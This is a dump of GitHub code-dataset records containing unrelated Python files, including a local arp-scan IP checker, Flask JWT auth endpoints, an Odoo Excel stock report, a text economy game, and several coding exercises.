goes wrong\n \"\"\"\n\n for outline in enumerate(rv):\n\n \"\"\" arp-scan tests each address for presence or absence of a system\n again, check it's installed\n \"\"\"\n print(outline)\n ipaddress = outline[1]\n cmdargs2 = [\"sudo\", \"arp-scan\", ipaddress]\n rc2, rv2 = execthis(cmdargs2, ipaddress)\n\n if not rc2:\n if len(arpproc) > 1:\n print(\"USED... \", end=\"\")\n else:\n print(\"FREE... {}\".format(outline))\n else:\n print(\"ARGH! Rc is {:04d}\".format(rc2))\n\n print(\"Ended {} with code {}\".format(myself, rc2))\n\n\"\"\" THE END\n\"\"\"\n","repo_name":"javierpeces/my-python-stuff","sub_path":"140-fmad-exec-nmap-arp-scan.py","file_name":"140-fmad-exec-nmap-arp-scan.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26390755316","text":"clients1 = [\n 'Davi',\n 'Maria',\n 'Doly',\n 'Thor'\n]\n\nclients2 = [\n 'Tânia',\n 'João',\n 'Jurema',\n 'Janice'\n]\n\ndict_ex = {\n 'Name': 'Davi',\n 'Age': 21\n}\n\n\n# try:\n# d2 = dicts('Name', 'Maria', 'Age', 23)\n# except:\n# d = {\n# 'Name': 'Maria',\n# 'Age': 23\n# }\n# d2 = dicts(d)\n\n# def dicts(key, value, dictionary=None):\n# if dictionary is None:\n# dictionary = {}\n# dictionary.update(key, value)\n# return dictionary","repo_name":"Davisilvas/pythonStudies","sub_path":"section3/lesson30/dados.py","file_name":"dados.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41001767300","text":"pic_wid = 640\npic_len = 400#NOT needed\ninitial_vel = 40\ndelta_wid = 80\ndelta_vel = 20\ndelta_radius = 50\n \ndef velcontrol(position_wid0,radius0):\n position_wid = position_wid0 - pic_wid * 0.5\n radius = radius0\n velosity_left = initial_vel\n velosity_right = initial_vel\n if position_wid > 0 :\n while ( position_wid > delta_wid ) :\n velosity_left = velosity_left + delta_vel\n #velosity_right = velosity_right - delta_vel\n position_wid = position_wid - delta_wid\n elif position_wid < 0 :\n while ( position_wid < - delta_wid ) :\n #velosity_left = velosity_left - delta_vel\n velosity_right = velosity_right + delta_vel\n position_wid = position_wid + delta_wid\n while ( radius > 0 ) :\n velosity_left = velosity_left - delta_vel\n velosity_right = velosity_right - delta_vel\n radius = radius - delta_radius\n return [velosity_left,velosity_right]\n\ndef driven(vel):\n vel4 = [0,0,0,0]\n if vel[0] > 0 :\n vel4[0] = vel[0]\n elif vel[0] < 0 :\n vel4[1] = - vel[0]\n if vel[1] > 0 :\n vel4[2] = vel[1]\n elif vel[1] < 0 :\n vel4[3] = - vel[1]\n return vel4\n","repo_name":"SiyuanMa0316/object_detection_for_vehicle","sub_path":"TraceControl.py","file_name":"TraceControl.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72018253672","text":"from ..base import BaseResource\nfrom ...models import UserModel, RevokedTokenModel\nfrom flask_jwt_extended import (\n create_access_token,\n create_refresh_token,\n jwt_required,\n jwt_refresh_token_required,\n get_jwt_identity,\n get_raw_jwt\n)\nfrom flask_restful import reqparse\n\n\nparser = reqparse.RequestParser()\nparser.add_argument('username', help='This field cannot be blank', required=True)\nparser.add_argument('password', help='This field cannot be blank', required=True)\n\n\nclass UserRegistration(BaseResource):\n def post(self):\n data = parser.parse_args()\n\n if UserModel.find_by_username(data['username']):\n return self.response(\n {'message': 'User {} already exists'.format(data['username'])}, 409\n )\n\n new_user = UserModel(\n username=data['username'],\n password=UserModel.generate_hash(data['password'])\n )\n\n try:\n new_user.add_user()\n access_token = create_access_token(identity=data['username'])\n refresh_token = create_refresh_token(identity=data['username'])\n return self.response(\n {\n 'message': 'User {} was created'.format(data['username']),\n 'accessToken': access_token,\n 'refreshToken': refresh_token\n }, 201\n )\n except:\n return self.response({'message': 'Something went wrong'}, 500)\n\n\nclass UserLogin(BaseResource):\n def post(self):\n data = parser.parse_args()\n current_user = UserModel.find_by_username(data['username'])\n if not current_user:\n return self.response(\n {'message': 'User {} doesn\\'t exists'.format(data['username'])}, 401\n )\n\n if UserModel.verify_hash(data['password'], current_user.password):\n access_token = create_access_token(identity=data['username'])\n refresh_token = create_refresh_token(identity=data['username'])\n return self.response(\n {\n 'message': 'Logged in as {}'.format(current_user.username),\n 'accessToken': access_token,\n 'refreshToken': refresh_token\n }, 300\n )\n else:\n return self.response({'message': 'Wrong credentials'}, 401)\n\n\nclass UserLogoutAccess(BaseResource):\n @jwt_required\n def post(self):\n jti = get_raw_jwt()['jti']\n try:\n revoked_token = RevokedTokenModel(jti=jti)\n revoked_token.add()\n return self.response({'message', 'Access token has been revoked'})\n except:\n return self.response({'message': 'Something went wrong'}, 500)\n\n\nclass UserLogoutRefresh(BaseResource):\n @jwt_refresh_token_required\n def post(self):\n jti = get_raw_jwt()['jti']\n try:\n revoked_token = RevokedTokenModel(jti=jti)\n revoked_token.add()\n return self.response({'message': 'Refresh token has been revoked'})\n except:\n return self.response({'message': 'Something went wrong'}, 500)\n\n\nclass TokenRefresh(BaseResource):\n @jwt_refresh_token_required\n def post(self):\n current_user = get_jwt_identity()\n access_token = create_access_token(current_user)\n return self.response({'accessToken': access_token})\n","repo_name":"Grzanka99/eegzaminy","sub_path":"api/app/resources/v1/access.py","file_name":"access.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71132748074","text":"n=int(input())\r\nset1=set(int(i) for i in input(\" \").split(\" \"))\r\n\r\nn1=int(input())\r\nset2=set(int(i) for i in input(\" \").split(\" \"))\r\n\r\nU=set1.union(set2)\r\nIntr=set1.intersection(set2)\r\n\r\nsym=U-Intr\r\nList1=[i for i in sym]\r\nList1.sort()\r\nfor i in List1:\r\n print(i)\r\n","repo_name":"Kunal352000/python_program","sub_path":"set2.py","file_name":"set2.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38296065768","text":"# -*- coding: utf-8 -*-\nfrom odoo import fields, models, api, _\nfrom odoo.exceptions import UserError\nimport xlsxwriter\nfrom io import BytesIO\nimport base64\nfrom datetime import datetime\nfrom odoo.osv import expression\n\n\n\n\n\nclass excelreport(models.TransientModel):\n _name = 'report.excel'\n\n excel_file = fields.Binary('Dowload report Excel', attachment=True, readonly=True)\n file_name = fields.Char('Excel File', size=64)\n\n\n\n\nclass badstockwizard(models.TransientModel):\n _name = 'bad.stock.wizard'\n\n\n excel_file = fields.Binary('Download report Excel', attachment=True, readonly=True)\n file_name = fields.Char('Excel File', size=64)\n date_from = fields.Datetime(string=\"Date From\")\n date_to = fields.Datetime(string=\"Date To\")\n product_id = fields.Many2one('product.product',domain=[('type','in',('product','consu'))],string=\"Product\")\n product_categ_ids = fields.Many2many('product.category',string=\"Product Categ\")\n location_id = fields.Many2one('stock.location',domain=[('usage','in',('internal','transit'))],string=\"Location\")\n search_by = fields.Selection([('product','Product'),('categ','Product Categ')],string=\"Search By\")\n\n def open_at_date(self,product,inventory_date):\n tree_view_id = self.env.ref('stock.view_stock_product_tree').id\n form_view_id = self.env.ref('stock.product_form_view_procurement_button').id\n domain = [('type', '=', 'product')]\n product_id = product\n if product_id:\n domain = expression.AND([domain, [('id', '=', product_id)]])\n\n action = {\n 'type': 'ir.actions.act_window',\n 'views': [(tree_view_id, 'tree'), (form_view_id, 'form')],\n 'view_mode': 'tree,form',\n 'name': _('Products'),\n 'res_model': 'product.product',\n 'domain': domain,\n 'context': dict(self.env.context, to_date=inventory_date),\n }\n my_action = action\n\n\n def action_bad_stock_search(self):\n\n act = self.generate_excel()\n\n return {\n\n 'type': 'ir.actions.act_window',\n 'res_model': 'report.excel',\n 'res_id': act.id,\n 'view_type': 'form',\n 'view_mode': 'form',\n 'context': self.env.context,\n 'target': 'new',\n\n }\n\n\n\n\n\n def generate_excel(self):\n\n filename = \"Bad Stock Wizard\"\n\n output = BytesIO()\n workbook = xlsxwriter.Workbook(output, {'in_memory': True})\n sheet = workbook.add_worksheet('Bad Stock Wizard')\n\n\n without_borders = workbook.add_format({\n 'bold': 1,\n 'border': 1,\n 'align': 'center',\n 'valign': 'vcenter',\n 'text_wrap': True,\n 'font_size': '11',\n\n })\n format0 = workbook.add_format({'font_size': 20, 'align': 'center', 'bold': True})\n format1 = workbook.add_format({'font_size': 10, 'align': 'center', 'bold': False})\n\n font_size_10 = workbook.add_format(\n {'font_name': 'KacstBook', 'font_size': 10, 'align': 'center', 'valign': 'vcenter', 'text_wrap': True,\n 'border': 1})\n\n table_header_formate = workbook.add_format({\n 'bold': 1,\n 'border': 1,\n 'bg_color': '#AAB7B8',\n 'font_size': '10',\n 'align': 'center',\n 'valign': 'vcenter',\n 'text_wrap': True\n })\n sheet.merge_range(1, 3, 2, 6,\"Bad Stock Wizard\", format0)\n sheet.merge_range(2, 7, 2, 8,\"Date : \"+str(datetime.today().strftime('%Y-%m-%d')), format1)\n\n sheet.set_column(4, 0, 9, without_borders)\n sheet.set_column(4, 9, 19, without_borders)\n sheet.write('A4', 'No', table_header_formate)\n sheet.write('B4', 'Product Code', table_header_formate)\n sheet.write('C4', 'Product Name', table_header_formate)\n sheet.write('D4', 'First Period', table_header_formate)\n sheet.write('E4', 'Ingoing', table_header_formate)\n sheet.write('F4', 'Outgoing', table_header_formate)\n sheet.write('G4', 'Balance', table_header_formate)\n sheet.write('H4', 'First Period Outgoing', table_header_formate)\n sheet.write('I4', 'Avg Of Cost', table_header_formate)\n sheet.write('J4', 'The Cost', table_header_formate)\n\n\n\n row = 4\n seq = 1\n col = 0\n if self.search_by =='product':\n all_stock_move_of_period = self.env['stock.move.line'].search(\n [('date', '>=', self.date_from), ('date', '<=', self.date_to),('product_id','=',self.product_id.id)])\n elif self.search_by =='categ':\n all_stock_move_of_period = self.env['stock.move.line'].search(\n [('date', '>=', self.date_from), ('date', '<=', self.date_to),('product_id.categ_id','in',self.product_categ_ids.ids)])\n elif not self.search_by :\n all_stock_move_of_period = self.env['stock.move.line'].search(\n [('date', '>=', self.date_from), ('date', '<=', self.date_to)])\n\n all_product_of_this_period = all_stock_move_of_period.mapped('product_id')\n all_from_location_this_period = all_stock_move_of_period.mapped('location_id')\n all_to_location_this_period = all_stock_move_of_period.mapped('location_dest_id')\n\n\n if self.location_id:\n all_from_location_this_period = all_from_location_this_period.filtered(lambda l: l.id == self.location_id.id )\n all_to_location_this_period = all_to_location_this_period.filtered(lambda l: l.id == self.location_id.id )\n\n\n for rec in all_product_of_this_period:\n product = rec.id\n domain = ([('id', '=', product)])\n my_products = self.env['product.product'].search(domain).with_context(\n dict(self.env.context, to_date=self.date_from))\n first_balance = my_products[0].qty_available\n if self.location_id:\n wared = sum (all_stock_move_of_period.filtered(lambda l: l.product_id.id == rec.id and l.location_dest_id.id ==self.location_id.id ).mapped('qty_done'))\n monsaref = sum (all_stock_move_of_period.filtered(lambda l: l.product_id.id == rec.id and l.location_id.id ==self.location_id.id ).mapped('qty_done'))\n else:\n wared = 0\n monsaref = 0\n for location in all_to_location_this_period :\n wared += sum (all_stock_move_of_period.filtered(lambda l: l.product_id.id == rec.id and l.location_dest_id.id ==location.id ).mapped('qty_done'))\n for location2 in all_from_location_this_period:\n monsaref += sum(all_stock_move_of_period.filtered(\n lambda l: l.product_id.id == rec.id and l.location_id.id == location2.id).mapped(\n 'qty_done'))\n\n sheet.write(row, col, str(seq) or '', font_size_10)\n sheet.write(row, col + 1, rec.default_code or '', font_size_10)\n sheet.write(row, col + 2, rec.name or '', font_size_10)\n sheet.write(row, col + 3, first_balance or '', font_size_10)\n sheet.write(row, col + 4, wared or '', font_size_10)\n sheet.write(row, col + 5, monsaref or '', font_size_10)\n sheet.write(row, col + 6, rec.qty_available or '', font_size_10)\n sheet.write(row, col + 7, first_balance - monsaref or '', font_size_10)\n sheet.write(row, col + 8, rec.standard_price or '', font_size_10)\n sheet.write(row, col + 9, (first_balance - monsaref) * rec.standard_price or '', font_size_10)\n\n row += 1\n seq += 1\n\n\n\n\n workbook.close()\n output.seek(0)\n\n self.write({'file_name': filename + str(datetime.today().strftime('%Y-%m-%d')) + '.xlsx'})\n self.excel_file = base64.b64encode(output.read())\n\n context = {\n 'file_name': self.file_name ,\n 'excel_file': self.excel_file,\n }\n\n act_id = self.env['report.excel'].create(context)\n return act_id\n\n\n\n\n\n\n\n","repo_name":"naham2021/bright_way","sub_path":"naham_bad_stock_excel/models/naham_bad_stock_excel_wizard_2.py","file_name":"naham_bad_stock_excel_wizard_2.py","file_ext":"py","file_size_in_byte":8076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34818285912","text":"version = 0.2\n\n\nimport LifeLike_color, LifeLike_games, LifeLike_help\n\nfrom importlib import reload\nimport shelve, random\n\n#get the saved variables from the save_game file\nshelvefile = shelve.open('save_game')\nwallet = shelvefile['wallet']\nbank = shelvefile['bank']\nnewUser = shelvefile['newUser']\nkeyboardLayout = shelvefile[\"keyboardLayout\"]\nshelvefile.close()\n\nrunning = True\ndebugger = False\npreviousCommand = \"\"\n\n\ndef toggleKeys():\n global keyboardLayout\n if keyboardLayout == \"zqsd\":\n keyboardLayout = \"wasd\"\n else: keyboardLayout = \"zqsd\"\n shelvefile = shelve.open('save_game')\n shelvefile['keyboardLayout'] = keyboardLayout\n shelvefile.close()\n\n\n#getting command as user input\ndef get_command():\n global previousCommand\n global newUser\n if debugger:\n print(LifeLike_color.RED)\n print(LifeLike_color.BOLD ,'[DEBUGGER] Type your commands here: ',LifeLike_color.END , end=\"\")\n else: print(LifeLike_color.BOLD ,'Type your commands here: ',LifeLike_color.END , end=\"\")\n Usercommand = input()\n newUser = False\n previousCommand = Usercommand\n return Usercommand\n\ndef parse_command(command):\n global running\n global wallet\n global bank\n global debugger\n global newUser\n\n parse_command = command.split()\n if parse_command[0] != \"pls\":\n command = 'pls ' + command\n parse_command = command.split()\n if len(parse_command) < 2:\n print('unknown command')\n return\n #if command contains a int as string, then make it a int\n preValue = str(parse_command[0] + parse_command[1]).lower()\n for index, command in enumerate(parse_command):\n if parse_command[index].isnumeric():\n parse_command[index] = int(command)\n\n #replace keywords max and half with integers\n def strToIntWallet():\n for index, command in enumerate(parse_command):\n if command == \"max\":\n parse_command[index] = int(wallet)\n elif command == \"half\":\n parse_command[index] = int(wallet / 2)\n def strToIntBank():\n for index, command in enumerate(parse_command):\n if command == \"max\":\n parse_command[index] = int(bank)\n elif command == \"half\":\n parse_command[index] = int(bank / 2)\n\n\n def checkIfValid():\n if len(parse_command) < 3:\n print('You must specify an amount!')\n return False\n elif isinstance(parse_command[2], int) == False:\n print(\"Not a valid amount, please use: max, half or an integer!\")\n return False\n else: return True\n\n #pls search command\n if preValue in ('plssearch'):\n gain = LifeLike_games.search(wallet, bank)\n if gain < 0:\n if wallet > (gain * -1):\n wallet += gain\n else:\n bank += gain\n else: wallet += gain\n #pls beg command\n elif preValue in (\"plsbeg\"):\n wallet += LifeLike_games.beg()\n #pls galble command\n elif preValue in ('plsgamble'):\n strToIntWallet()\n change = LifeLike_games.gamble(parse_command, bank)\n wallet += change\n if change != 0: print(\" You now have \", wallet, \" in wallet\")\n #pls slots commands\n elif preValue in ('plsslots'):\n strToIntWallet()\n change = LifeLike_games.slots(parse_command, bank)\n wallet += change\n if change != 0:print(\" You now have \", wallet, \" in wallet\")\n #pls postmemes command\n elif preValue in (\"plspm\", \"plspostmemes\", \"plspostmeme\"):\n wallet += LifeLike_games.postmeme()\n #pls upload command\n elif preValue in (\"plsupload\", \"plsyt\", \"plsyoutube\"):\n wallet += LifeLike_games.upload()\n #pls hunt command\n elif preValue in (\"plshunt\"):\n LifeLike_games.hunt()\n #pls fish command\n elif preValue in (\"plsfish\"):\n LifeLike_games.fish()\n #pls mazegame command\n elif preValue in (\"plsmazegame\", \"plsmaze\"):\n wallet += LifeLike_games.playmaze(keyboardLayout)\n #pls balance command\n elif preValue in ('plsbal', \"plsbalance\"):\n print(\"====================================\")\n print(\"|| coins in \", LifeLike_color.RED , \"wallet\",LifeLike_color.END , wallet)\n print(\"|| coins in \", LifeLike_color.GREEN , \"bank \",LifeLike_color.END , bank)\n print(\"|| coins in \", LifeLike_color.CYAN, \"total \", LifeLike_color.END, (wallet + bank))\n print(\"====================================\")\n #pls deposit command\n elif preValue in ('plsdep', 'plsdeposit'):\n strToIntWallet()\n if checkIfValid() == False: return\n if int(parse_command[2]) > wallet:\n print(\"You cant deposit more than you have in your wallet dummy!\")\n return\n bank += parse_command[2]\n wallet -= parse_command[2]\n print(\" coins in \", LifeLike_color.RED , \"wallet\",LifeLike_color.END , wallet)\n print(\" coins in \", LifeLike_color.GREEN , \"bank\",LifeLike_color.END , bank)\n #pls withdraw command\n elif preValue in ('plswith', 'plswithdraw'):\n strToIntBank()\n if checkIfValid() == False: return\n if parse_command[2] > bank:\n print(\"You cant withdraw more than you have in your bank dummy!\")\n return\n bank -= parse_command[2]\n wallet += parse_command[2]\n print(\" coins in \", LifeLike_color.RED , \"wallet\",LifeLike_color.END , wallet)\n print(\" coins in \", LifeLike_color.GREEN , \"bank\",LifeLike_color.END , bank)\n #pls inventory command\n elif preValue in (\"plsinv\", \"plsinventory\"):\n LifeLike_games.openinv()\n #pls shop command\n elif preValue in (\"plsshop\"):\n LifeLike_games.openshop()\n #pls buy command\n elif preValue in (\"plsbuy\"):\n temp = []\n for index,each in enumerate(parse_command[0:]):\n if each in (\"pls\", \"buy\"):\n pass\n else: temp.append(parse_command[index])\n wallet -= LifeLike_games.buy(\" \".join(temp), wallet)\n #pls sell commands\n elif preValue in (\"plssell\"):\n wallet += LifeLike_games.sell(parse_command[2:])\n #pls drive command\n elif preValue == 'plsdrive':\n LifeLike_games.road(20, 0.05)\n #pls settings command\n elif preValue in (\"plssettings\",\"plssetting\"):\n ret = LifeLike_help.settings(parse_command[2:])\n if ret == \"toggleKeys\":\n toggleKeys()\n #pls help command(s)\n elif preValue in (\"plshelp\"):\n if len(parse_command) < 3:\n newUser = False\n LifeLike_help.help(0)\n elif len(parse_command) == 3:\n newUser = False\n print(LifeLike_help.help(parse_command[2]))\n else:\n newUser = False\n print(\"We do not currently have a help page for that!\")\n #pls reset\n elif preValue == 'plsreset':\n print(\"Do you really want to \", LifeLike_color.RED, LifeLike_color.UNDERLINE, LifeLike_color.BOLD, \"RESET\", LifeLike_color.END, \" your progress?\", sep=\"\")\n print(\"Type RESET to reset, press enter if you DO NOT want to RESET!\")\n\n if input() == \"RESET\":\n wallet = 500\n bank = 0\n LifeLike_games.reset()\n newUser = True\n shelvefile = shelve.open('save_game')\n shelvefile['newUser'] = newUser\n shelvefile.close()\n else: return\n\n #exit the game\n elif preValue == 'plsexit' or preValue == 'plsstop':\n running = False\n return\n\n elif preValue == \"plsversion\":\n print(f\"Lifelike version {version}\")\n\n #debugger ===================================\n elif preValue == \"plsdebug\":\n if debugger == False:\n print('Password: ', end=\"\")\n if input() == \"bitchboygeorge\":\n #if input() == \"\":\n print(LifeLike_color.RED)\n debugger = True\n else: print(\"Wrong password\")\n else:\n debugger = False\n LifeLike_games.toggleDebug(False)\n elif debugger == True:\n if preValue == \"plsgimme\":\n wallet += parse_command[2]\n elif preValue == \"plsset\":\n wallet = parse_command[2]\n elif preValue == \"plsreload\":\n reload(LifeLike_games)\n elif preValue == \"plsfaster\":\n print(LifeLike_color.DGREEN,' All delays turned off!',LifeLike_color.END)\n LifeLike_games.toggleDebug(True)\n elif preValue == \"plsslower\":\n print(LifeLike_color.RED,' All delays turned on!',LifeLike_color.END)\n LifeLike_games.toggleDebug(False)\n #end of debugger ===================================\n\n else:\n print('unknown command')\nwhile running == True:\n if newUser == True:\n print(LifeLike_color.BOLD, LifeLike_color.RED)\n print(\" If this is your first time playing, \")\n print(\" use 'pls help' to get info on all the commands!\")\n print(LifeLike_color.END)\n parse_command(get_command())\n shelvefile = shelve.open('save_game')\n shelvefile['wallet'] = wallet\n shelvefile['bank'] = bank\n shelvefile['newUser'] = newUser\n shelvefile.close()\n print('')\n","repo_name":"vanArthur/lifelike","sub_path":"LifeLike.py","file_name":"LifeLike.py","file_ext":"py","file_size_in_byte":9211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34984145924","text":"# Set de problemas #3\n# Problema 1.\n# Lenguaje y Tecnicas de Programacion\n# Profesor: Igor Caracci\n# Profesor(Ayudante): Andres Caro\n# Universidad de Santiago de Chile\n# 10 de mayo del 2013\n#\n# Descripcion:\n#\n# Construya una función recursiva tri_pascal(n) que tome como argumento\n# el grado del binomio asociado a los coeficientes binomiales y construya\n# el triángulo de Pascal mostrando hasta los coeficientes del polinomio de\n# grado n resultante.\n\n# Funcion del triangulo pascal recursivo\ndef tri_pascal(n): \n\n # En el caso de la parte base del triangulo \n if n == 0: \n return [] \n if n == 1:\n return[[1]] \n\n # Parte del triangulo en forma recursiva \n ultimo_triangulo = tri_pascal(n-1) \n current_triangulo = [1] \n for i in range(1, n-1): \n current_triangulo.append(ultimo_triangulo[n-2][i-1] + ultimo_triangulo[n-2][i]) \n current_triangulo.append(1)\n ultimo_triangulo.append(current_triangulo)\n return ultimo_triangulo\n\ndef ultimo_triangulo(n):\n triangulo = tri_pascal(n)\n return triangulo[n-1]\n\nwhile True:\n grado = input(\"Grado del triangulo : \")\n if ( not grado.isnumeric() ):\n print(\"Error, \",grado,\" no es un numero \")\n elif ( int(grado) < 1 ):\n print(\"Error, numero \",grado,\" menor a 1\")\n else:\n triangulos = tri_pascal(int(grado))\n i = 0\n for fila in triangulos:\n print(\"n =\",i,\":\",end=\"\")\n i = i + 1\n for coef in fila:\n print(coef,\" \",end=\"\")\n print()\n break\n","repo_name":"Dhual-Yhn/setp03","sub_path":"tri_pascal.py","file_name":"tri_pascal.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26680747986","text":"#!/usr/bin/env python\n\nfrom os.path import join, dirname, abspath\n\nfrom IPython.terminal.ipapp import TerminalIPythonApp\nfrom ipykernel.kernelapp import IPKernelApp\n\nhere = abspath(dirname(__file__))\noptions = join(here, 'source', 'config', 'options')\ngenerated = join(options, 'generated.rst')\n\ndef write_doc(name, title, app, preamble=None):\n filename = '%s.rst' % name\n with open(join(options, filename), 'w') as f:\n f.write(title + '\\n')\n f.write(('=' * len(title)) + '\\n')\n f.write('\\n')\n if preamble is not None:\n f.write(preamble + '\\n\\n')\n f.write(app.document_config_options())\n with open(generated, 'a') as f:\n f.write(filename + '\\n')\n\n\nif __name__ == '__main__':\n # create empty file\n with open(generated, 'w'):\n pass\n\n write_doc('terminal', 'Terminal IPython options', TerminalIPythonApp())\n write_doc('kernel', 'IPython kernel options', IPKernelApp(),\n preamble=(\"These options can be used in :file:`ipython_kernel_config.py`. \"\n \"The kernel also respects any options in `ipython_config.py`\"),\n )\n\n","repo_name":"DiegoAgher/imag_recognition_project","sub_path":"ipython/docs/autogen_config.py","file_name":"autogen_config.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22960647639","text":"#!/usr/bin/python3\nimport argparse, challenge3\n\nif __name__ == \"__main__\":\n\tDESCRIPTION = \"\"\"Find a single XOR'd ciphertext in a list of ciphertexts and break it.\n\thttps://cryptopals.com/sets/1/challenges/4\"\"\"\n\tparser = argparse.ArgumentParser(prog='Cryptopals Set 1 - Challenge 4', description=DESCRIPTION)\n\tparser.add_argument('-f','--file', required=True, type=argparse.FileType('r') , help='File containing ciphertexts one per line.')\n\targs = parser.parse_args()\n\tciphertexts = args.file.read().splitlines()\n\tprint(\"{0} ciphertexts loaded.\".format(len(ciphertexts)))\n\tresult = list()\n\tfor ciphertext in ciphertexts:\n\t\tresult.append(challenge3.breaksinglexor(ciphertext,top=1))\n\tprint(\"Showing possible result:\")\n\tcandidate = {'count' : 0}\n\tj = 0\n\tfor i in result:\n\t\tif i:\n\t\t\tif candidate['count'] < i[0]['count']:\n\t\t\t\tcandidate = i[0]\n\t\t\t\tj = result.index(i)\n\tprint(\"Key: {0} Ciphertext: {1} Plaintext: {2}\".format(candidate['key'],ciphertexts[j],candidate['plaintext']))","repo_name":"videlanicolas/cryptopals","sub_path":"set1/challenge4/challenge4.py","file_name":"challenge4.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32460584386","text":"import cv2 as cv\nimport numpy as np\nimport Util.VisionUtil.VisionUtil as VisionUtil\nfrom math import atan2, cos, sin, sqrt, pi\n\nfrom scipy.spatial import distance as dist\n\n# VisionUtil = VisionUtil.VisionUtil\n\nclass MathHelper:\n \n horizontal = [1., 0.]\n\n def getPrincipalAxes(contourPoints):\n mean = np.empty((0))\n mean, eigenvectors, eigenvalues = cv.PCACompute2(contourPoints, mean)\n cntr = (int(mean[0, 0]), int(mean[0, 1]))\n x = [eigenvectors[0][0], eigenvectors[1][0]]\n y = [eigenvectors[0][1], eigenvectors[1][1]]\n p1 = (cntr[0] + 0.02 * eigenvectors[0,0] * eigenvalues[0,0], cntr[1] + 0.02 * eigenvectors[0,1] * eigenvalues[0,0])\n p2 = (cntr[0] - 0.02 * eigenvectors[1,0] * eigenvalues[1,0], cntr[1] - 0.02 * eigenvectors[1,1] * eigenvalues[1,0])\n return x, y, cntr\n\n def sortRectPoints(pts):\n # sort the points based on their x-coordinates\n xSorted = pts[np.argsort(pts[:, 0]), :]\n \n # grab the left-most and right-most points from the sorted\n # x-roodinate points\n leftMost = xSorted[:2, :]\n rightMost = xSorted[2:, :]\n \n # now, sort the left-most coordinates according to their\n # y-coordinates so we can grab the top-left and bottom-left\n # points, respectively\n leftMost = leftMost[np.argsort(leftMost[:, 1]), :]\n (tl, bl) = leftMost\n \n # now that we have the top-left coordinate, use it as an\n # anchor to calculate the Euclidean distance between the\n # top-left and right-most points; by the Pythagorean\n # theorem, the point with the largest distance will be\n # our bottom-right point\n D = dist.cdist(tl[np.newaxis], rightMost, \"euclidean\")[0]\n (br, tr) = rightMost[np.argsort(D)[::-1], :]\n \n # return the coordinates in top-left, top-right,\n # bottom-right, and bottom-left order\n return np.array([tl, tr, br, bl], dtype=\"float32\")\n \n def getBoundingBoxPoints(points):\n x, y, w, h = cv.boundingRect(points)\n boundingBoxPoints = np.array([[x, y],\n [x + w, y],\n [x + w, y - h],\n [x, y - h]\n ], dtype=np.float32)\n # return the bounding box verticies, the area of the bounding box, and the aspect ratio of the width and height of the boudning box\n return boundingBoxPoints, w * h, w / h\n \n def getReferenceVector(pts):\n # first sort the points in a clockwise manner\n pts = MathHelper.sortRectPoints(pts)\n\n # construct our reference vector and normalize it\n referenceVector = [pts[1][0] - pts[0][0], pts[0][1] - pts[1][1]]\n referenceVector = MathHelper.norm(referenceVector)\n\n return referenceVector\n\n # get the midpoint of a contour\n def getMidpoint(pts):\n return 0\n\n def rotatePoint(pt, angle):\n x = (pt[0] * np.cos(angle)) - (pt[1] * np.sin(angle))\n y = (pt[1] * np.cos(angle)) + (pt[0] * np.sin(angle))\n return [x, y]\n\n def dot(a, b): \n return (a[0] * b[0]) + (a[1] * b[1])\n\n def norm(vector):\n return vector / MathHelper.getLength(vector)\n\n def getLength(vector):\n return np.linalg.norm(vector)\n\n def getRelativeAngleDirection(a, b):\n return ((a[0] * b[1]) - (a[1] * b[0])) > 0\n\n def getAngle(a, b, signedRange = None):\n rotation = np.arccos(round(MathHelper.dot(a, b), 6) / round((MathHelper.getLength(a) * MathHelper.getLength(b)), 6))\n if signedRange is not None:\n sign = MathHelper.getRelativeAngleDirection(a, b)\n if (not sign):\n if (signedRange):\n rotation = rotation * -1.0\n else :\n rotation = (2 * np.pi) - rotation\n return rotation","repo_name":"FRCTeam2910/JesterVision","sub_path":"src/Util/MathUtil/MathHelper.py","file_name":"MathHelper.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74714038952","text":"import sys\n# sys.stdin = open('input.txt','r')\ninput = sys.stdin.readline\n\nfor _ in range(int(input())):\n n = int(input())\n s = input()\n cnt = 0\n for i in range(n):\n cnt += s[i] == '0'\n if cnt == 1:\n print(\"BOB\")\n elif cnt & 1 == 0:\n print(\"BOB\")\n else:\n print(\"ALICE\")","repo_name":"dminhvu/CompetitiveProgramming","sub_path":"Coding Problems/Codeforces/1527B1.py","file_name":"1527B1.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9848473979","text":"import os\nimport random\nimport json\nimport torch\nimport torch.nn as nn\n\nfrom collections import namedtuple\n\n# Can be simply regarded as a object, called \"Batch\", having attributes \"input\" and \"target\"\nBatch = namedtuple('Batch', 'input target')\n\n# bert-like processing\ndef parse_sentence(sent, word_to_idx, max_seq_len):\n token_idxs, token_type_idxs, mask = [word_to_idx('[CLS]')], [0], [1] # (seq_len)\n\n length = len(sent)\n if length > max_seq_len - 2:\n # print ('Warning: exceed max_seq_len')\n length = max_seq_len - 2\n sent = sent[:length]\n\n token_idxs += [word_to_idx(w) for w in sent] + [word_to_idx('[SEP]')]\n token_type_idxs += [0] * (length + 1) # +1 for [SEP] following the 